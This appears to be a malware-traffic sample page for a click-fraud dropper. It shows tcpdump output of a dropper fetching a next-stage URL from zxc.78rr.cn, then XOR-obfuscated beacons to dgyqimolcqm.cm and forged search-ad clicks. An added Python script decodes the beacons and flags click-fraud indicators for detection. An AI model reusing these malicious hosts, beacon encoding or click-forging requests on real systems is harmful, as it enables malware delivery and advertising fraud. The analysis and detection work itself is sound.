ClickFraud Malware Dropper Downloader PCAP File Download Traffic Sample

Download Attachments

  • 1 pcap 19
    Date added: May 24, 2019 12:02 am Added by: admin File size: 6 MB Downloads: 9

2011-08-17 03:46:37.698781 IP 147.32.84.130.3930 > 222.189.228.111.3389: Flags [P.], seq 1:82, ack 1, win 64240, length 81
E..y{.@...... T....o.Z.=TP......P.......GET /tool/train/c.txt HTTP/1.1
User-Agent: VBTagEdit
Host: zxc.78rr.cn:3389

2011-08-17 03:46:37.698788 IP 147.32.84.130.3930 > 222.189.228.111.3389: Flags [P.], seq 1:82, ack 1, win 64240, length 81
E..y{.@...... T....o.Z.=TP......P.......GET /tool/train/c.txt HTTP/1.1
User-Agent: VBTagEdit
Host: zxc.78rr.cn:3389

2011-08-17 03:46:38.011101 IP 222.189.228.111.3389 > 147.32.84.130.3930: Flags [P.], seq 1:404, ack 82, win 65454, length 403
E.....@.i.Fq...o. T..=.Z....TP.9P.......HTTP/1.1 200 OK
Content-Length: 177
Content-Type: text/plain
Last-Modified: Sat, 09 Jul 2011 13:39:06 GMT

Accept-Ranges: bytes

|http://zhu.kc18.cn:3389/128.htm
2011-08-17 03:46:38.185689 IP 147.32.84.130.3930 > 222.189.228.111.3389: Flags [.], ack 404, win 63837, length 0
E..({.@....2. T....o.Z.=TP.9....P..]K!..GET /t
2011-08-17 03:46:38.185700 IP 147.32.84.130.3930 > 222.189.228.111.3389: Flags [.], ack 404, win 63837, length 0
E..({.@....2. T....o.Z.=TP.9....P..]K!..GET /t
2012-10-04 10:26:22.527751 IP 192.168.248.1.59315 > 192.168.248.255.5002: UDP, length 306
E..N….@…………….:.uDRINETTM……….?……nH…..@lH…….M…..@.iqn.2005-09.com.drobo.host:admins-Mac-Pro.local4ecbf077…………………………………………………………………………………………………………………………………………………………………………………
2012-10-04 10:26:27.566140 IP 192.168.248.1.59315 > 192.168.248.255.5002: UDP, length 306
E..N….@.Zb………….:.uDRINETTM……….?……nH…..@lH…….M…..@.iqn.2005-09.com.drobo.host:admins-Mac-Pro.local4ecbf077…………………………………………………………………………………………………………………………………………………………………………………
2012-10-04 10:26:32.602580 IP 192.168.248.1.59315 > 192.168.248.255.5002: UDP, length 306
E..N….@…………….:.uDRINETTM……….?……nH…..@lH…….M…..@.iqn.2005-09.com.drobo.host:admins-Mac-Pro.local4ecbf077…………………………………………………………………………………………………………………………………………………………………………………
2012-10-04 10:26:37.520204 IP 192.168.248.1.17500 > 192.168.248.255.17500: UDP, length 310
E..R....@.hs........D\D.>%r{"host_int": 129667009, "version": [1, 8], "displayname": "129667009", "port": 17500, "namespaces": [173402115, 164806200, 81434131, 169597399, 23578136, 115911321, 165474655, 89292257, 26249186, 87070436, 98532453, 102394472, 68274857, 125331760, 93464947, 87860457, 69806233, 146989439, 83940796, 139226175]}
2012-10-04 10:26:37.638864 IP 192.168.248.1.59315 > 192.168.248.255.5002: UDP, length 306

E..N….@..………….:.uDRINETTM……….?……nH…..@lH…….M…..@.iqn.2005-09.com.drobo.host:admins-Mac-Pro.local4ecbf077…………………………………………………………………………………………………………………………………………………………………………………

2012-10-04 10:27:15.984833 IP 192.168.248.165.1111 > 108.168.255.244.80: Flags [.], ack 1, win 64240, length 0
E..(.s@....q....l....W.P..(h...GP.......
2012-10-04 10:27:15.984940 IP 192.168.248.165.1111 > 108.168.255.244.80: Flags [P.], seq 1:71, ack 1, win 64240, length 70: HTTP: GET /app/geoip.js HTTP/1.0
E..n.t@....*....l....W.P..(h...GP.......GET /app/geoip.js HTTP/1.0
Host: j.maxmind.com
Connection: close

2012-10-04 10:27:15.990195 IP 108.168.255.244.80 > 192.168.248.165.1111: Flags [.], ack 71, win 64240, length 0
E..(......|.l........P.W...G..(.P.............
2012-10-04 10:27:15.990228 IP 108.168.255.244.80 > 192.168.248.165.1111: Flags [FP.], seq 1:722, ack 71, win 64240, length 721: HTTP: HTTP/1.0 200 OK
E.........z$l........P.W...G..(.P.......HTTP/1.0 200 OK
Expires: Wed, 07 Aug 2013 19:04:11 GMT

Cache-Control: private, max-age=0

2012-10-04 10:30:25.388047 IP 192.168.248.165.1137 > 108.168.255.244.80: Flags [.], ack 1, win 64240, length 0
E..(.a@.........l....q.P..e.....P...;R..
2012-10-04 10:30:25.388126 IP 192.168.248.165.1137 > 108.168.255.244.80: Flags [P.], seq 1:71, ack 1, win 64240, length 70: HTTP: GET /app/geoip.js HTTP/1.0
E..n.b@....<....l....q.P..e.....P...7O..GET /app/geoip.js HTTP/1.0
Host: j.maxmind.com
Connection: close

2012-10-04 10:30:25.388283 IP 108.168.255.244.80 > 192.168.248.165.1137: Flags [.], ack 71, win 64240, length 0
E..(......|(l........P.q......e.P...;.........
2012-10-04 10:30:25.392440 IP 108.168.255.244.80 > 192.168.248.165.1137: Flags [FP.], seq 1:722, ack 71, win 64240, length 721: HTTP: HTTP/1.0 200 OK
E.........yVl........P.q......e.P.../J..HTTP/1.0 200 OK
Expires: Wed, 07 Aug 2013 19:07:20 GMT

Cache-Control: private, max-age=0

2012-10-04 10:30:34.381272 IP 192.168.248.165.1138 > 81.17.26.187.80: Flags [.], ack 1, win 64240, length 0
E..(..@....3....Q....r.Pg.^f.&..P.......
2012-10-04 10:30:34.381377 IP 192.168.248.165.1138 > 81.17.26.187.80: Flags [P.], seq 1:361, ack 1, win 64240, length 360: HTTP: GET /X11HXlhHWF1bR1hbWUZcXA8KCloKW19QCF0NDF8LXlpZCw0IUAtYWF9aCgsNXFMaUFwCUBwTCBMQU1k= HTTP/1.1
E.....@.........Q....r.Pg.^f.&..P...r...GET /X11HXlhHWF1bR1hbWUZcXA8KCloKW19QCF0NDF8LXlpZCw0IUAtYWF9aCgsNXFMaUFwCUBwTCBMQU1k= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/20.0.782.112 Safari/535.1
Accept-Encoding: gzip, deflate
Host: dgyqimolcqm.cm
Connection: Keep-Alive

2012-10-04 10:30:34.381534 IP 81.17.26.187.80 > 192.168.248.165.1138: Flags [.], ack 361, win 64240, length 0
E..(......|.Q........P.r.&..g._.P....n........
2012-10-04 10:30:40.464647 IP 192.168.248.165.1141 > 64.71.142.120.80: Flags [.], ack 1, win 64240, length 0
E..(..@...q-....@G.x.u.P?.X.....P.......
2012-10-04 10:30:40.464937 IP 192.168.248.165.1141 > 64.71.142.120.80: Flags [P.], seq 1:400, ack 1, win 64240, length 399: HTTP: GET /55fcc3c269a4de6b730bda9b1163cbd5:s95k9uzazy:0 HTTP/1.1
E.....@...o.....@G.x.u.P?.X.....P...p...GET /55fcc3c269a4de6b730bda9b1163cbd5:s95k9uzazy:0 HTTP/1.1
Accept: */*
Referer: http://egyptian-treasure.com/?afdt=z0v90dzttmcm83htf2w9m23b4jj521oqshirksa5i3bs&x=12&y=7&search=pain+patches+for+back+pain
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/20.0.782.112 Safari/535.1
Host: 64.71.142.120
Connection: Keep-Alive

2012-10-04 10:30:40.465142 IP 64.71.142.120.80 > 192.168.248.165.1141: Flags [.], ack 400, win 64240, length 0
E..(........@G.x.....P.u....?.Z!P.............
2012-10-04 10:31:34.389896 IP 192.168.248.165.1143 > 81.17.26.187.80: Flags [.], ack 1, win 64240, length 0
E..(..@.........Q....w.Pt...R..TP...B:..
2012-10-04 10:31:34.395945 IP 192.168.248.165.1143 > 81.17.26.187.80: Flags [P.], seq 1:361, ack 1, win 64240, length 360: HTTP: GET /X1xHXVBHW1pHWF1fRlxcDwoKWgpbX1AIXQ0MXwteWlkLDQhQC1hYX1oKCw1cUxpQXAJQHBMIExBTWA== HTTP/1.1
E.....@....z....Q....w.Pt...R..TP.......GET /X1xHXVBHW1pHWF1fRlxcDwoKWgpbX1AIXQ0MXwteWlkLDQhQC1hYX1oKCw1cUxpQXAJQHBMIExBTWA== HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/20.0.782.112 Safari/535.1
Accept-Encoding: gzip, deflate
Host: dgyqimolcqm.cm
Connection: Keep-Alive

2012-10-04 10:31:34.396130 IP 81.17.26.187.80 > 192.168.248.165.1143: Flags [.], ack 361, win 64240, length 0
E..(.B....|sQ........P.wR..Tt..JP...@.........
2012-10-04 10:31:34.631449 IP 192.168.248.165.1144 > 65.49.23.146.80: Flags [.], ack 1, win 64240, length 0
E..(..@.........A1...x.P.DF.....P...@F..
2012-10-04 10:31:34.631648 IP 192.168.248.165.1144 > 65.49.23.146.80: Flags [P.], seq 1:399, ack 1, win 64240, length 398: HTTP: GET /55fcc3c269a4de6b730bda9b1163cbd5:s95k9uzazy:1 HTTP/1.1
E.....@....W....A1...x.P.DF.....P...k...GET /55fcc3c269a4de6b730bda9b1163cbd5:s95k9uzazy:1 HTTP/1.1
Accept: */*
Referer: http://egyptian-treasure.com/?afdt=z0v90dzttmcm83htf2w9m23b4jj521oqshirksa5i3bs&x=12&y=7&search=pain+patches+for+back+pain
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/20.0.782.112 Safari/535.1
Host: 65.49.23.146
Connection: Keep-Alive

2012-10-04 10:31:34.631827 IP 65.49.23.146.80 > 192.168.248.165.1144: Flags [.], ack 399, win 64240, length 0
E..(.H.....vA1.......P.x.....DHuP...>.........
2012-10-04 10:32:34.372385 IP 192.168.248.165.1146 > 81.17.26.187.80: Flags [.], ack 1, win 64240, length 0
E..(.R@....c....Q....z.P,1.a21..P...wK..
2012-10-04 10:32:34.372512 IP 192.168.248.165.1146 > 81.17.26.187.80: Flags [.], seq 1:1461, ack 1, win 64240, length 1460: HTTP: GET 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[!http]
E....S@.........Q....z.P,1.a21..P...0..GET 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
2012-10-04 10:32:34.372595 IP 192.168.248.165.1146 > 81.17.26.187.80: Flags [P.], seq 1461:2273, ack 1, win 64240, length 812: HTTP
E..T.T@....5....Q....z.P,1..21..P.......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 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/20.0.782.112 Safari/535.1
Accept-Encoding: gzip, deflate
Host: dgyqimolcqm.cm
Connection: Keep-Alive
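Reading the two segments above: the 2011 packets are the dropper stage, a GET for /tool/train/c.txt with the unusual User-Agent VBTagEdit to a web server listening on port 3389, whose text/plain body carries a pipe-delimited pointer to the next stage (|http://zhu.kc18.cn:3389/128.htm). The 2012 packets are the click-fraud stage: two geolocation lookups of j.maxmind.com/app/geoip.js, then a repeating pair of requests. First a GET to dgyqimolcqm.cm whose path is a base64 blob; a few seconds later a GET to a bare IP address for /55fcc3c269a4de6b730bda9b1163cbd5:s95k9uzazy:<n>, with a fabricated Referer pointing at egyptian-treasure.com and a shopping search query, i.e. a faked click on a search ad. Base64-decoding each blob and XORing every byte with 0x69 yields exactly the Host and path of the click request that follows it (64.71.142.120/55fcc...:0 and 65.49.23.146/55fcc...:1), so the beacon encodes the upcoming click target in a trivially obfuscated form.

The script below is an added example written for this page; it is not code from the capture, the malware, or any tool the page mentions. The request list is transcribed from the GET lines above (the j.maxmind.com entry is included to show a benign request is not flagged). Rather than hard-coding 0x69, it brute-forces the single-byte XOR key under which a blob decodes to "<ipv4>/<path>", decodes both beacons, matches each to the later request that fetched the same Host + path, and lists the click-fraud indicators visible in that request's headers.

```python
"""Decode the dgyqimolcqm.cm beacons from the capture above and tie each one
to the faked ad click that follows it. Added example for this page, not code
from the capture or the malware."""
import base64
import ipaddress
import re
from urllib.parse import parse_qs, urlparse

# Transcribed from the GET requests in the tcpdump output above:
# (Host header, request path, Referer header or None), in capture order.
REFERER = ("http://egyptian-treasure.com/?afdt=z0v90dzttmcm83htf2w9m23b4jj521oqshirksa5i3bs"
           "&x=12&y=7&search=pain+patches+for+back+pain")
SAMPLE_REQUESTS = [
    ("j.maxmind.com", "/app/geoip.js", None),
    ("dgyqimolcqm.cm",
     "/X11HXlhHWF1bR1hbWUZcXA8KCloKW19QCF0NDF8LXlpZCw0IUAtYWF9aCgsNXFMaUFwCUBwTCBMQU1k=", None),
    ("64.71.142.120", "/55fcc3c269a4de6b730bda9b1163cbd5:s95k9uzazy:0", REFERER),
    ("dgyqimolcqm.cm",
     "/X1xHXVBHW1pHWF1fRlxcDwoKWgpbX1AIXQ0MXwteWlkLDQhQC1hYX1oKCw1cUxpQXAJQHBMIExBTWA==", None),
    ("65.49.23.146", "/55fcc3c269a4de6b730bda9b1163cbd5:s95k9uzazy:1", REFERER),
]

BEACON_HOST = "dgyqimolcqm.cm"
# A decoded beacon is expected to read "<dotted IPv4>/<path>".
TARGET_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}/\S+$")
# Click-request path shape seen above: /<32 hex chars>:<alphanumeric tag>:<counter>
CLICK_PATH_RE = re.compile(r"^/[0-9a-f]{32}:[a-z0-9]+:\d+$")


def recover_xor_key(blob: bytes) -> int:
    """Brute-force the single-byte XOR key under which the blob becomes
    "<ip>/<path>". Only one key can map the separator byte to 0x2E ('.'),
    so the first hit is the only hit."""
    for key in range(256):
        plain = bytes(b ^ key for b in blob)
        if plain.isascii() and TARGET_RE.match(plain.decode("ascii")):
            return key
    raise ValueError("no single-byte XOR key yields an ip/path string")


def decode_beacon(path: str) -> str:
    """Base64-decode a beacon path, then strip the recovered XOR layer."""
    blob = base64.b64decode(path.lstrip("/"))
    key = recover_xor_key(blob)
    return bytes(b ^ key for b in blob).decode("ascii")


def click_fraud_indicators(host: str, path: str, referer) -> list:
    """Header-level heuristics for a synthetic ad click; each one is visible
    in the click requests above. Returns the list of triggered reasons."""
    reasons = []
    try:
        ipaddress.ip_address(host)
        reasons.append("Host header is a bare IP address")
    except ValueError:
        pass
    if CLICK_PATH_RE.match(path):
        reasons.append("path is <md5>:<tag>:<counter>")
    if referer:
        ref = urlparse(referer)
        if ref.hostname and ref.hostname != host:
            reasons.append("Referer host differs from Host")
        if "search" in parse_qs(ref.query):
            reasons.append("Referer carries a search query (simulated search-ad click)")
    return reasons


def correlate_beacons(requests):
    """For every beacon, decode it and find the later request whose
    Host + path equals the decoded target. Returns (target, indicators) pairs."""
    matches = []
    for i, (host, path, _) in enumerate(requests):
        if host != BEACON_HOST:
            continue
        target = decode_beacon(path)
        for later_host, later_path, later_ref in requests[i + 1:]:
            if later_host + later_path == target:
                matches.append((target, click_fraud_indicators(later_host, later_path, later_ref)))
                break
    return matches


if __name__ == "__main__":
    for target, reasons in correlate_beacons(SAMPLE_REQUESTS):
        print(target)
        for reason in reasons:
            print("  -", reason)
```

Running it prints both decoded targets with four indicators each. For a detection rule, the Referer/Host mismatch combined with a search= parameter is the durable signal: the MD5-like path, the bare-IP Host and the XOR key are all cheap for the operator to change, and the dgyqimolcqm.cm request alone looks like an ordinary GET until its path is decoded.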
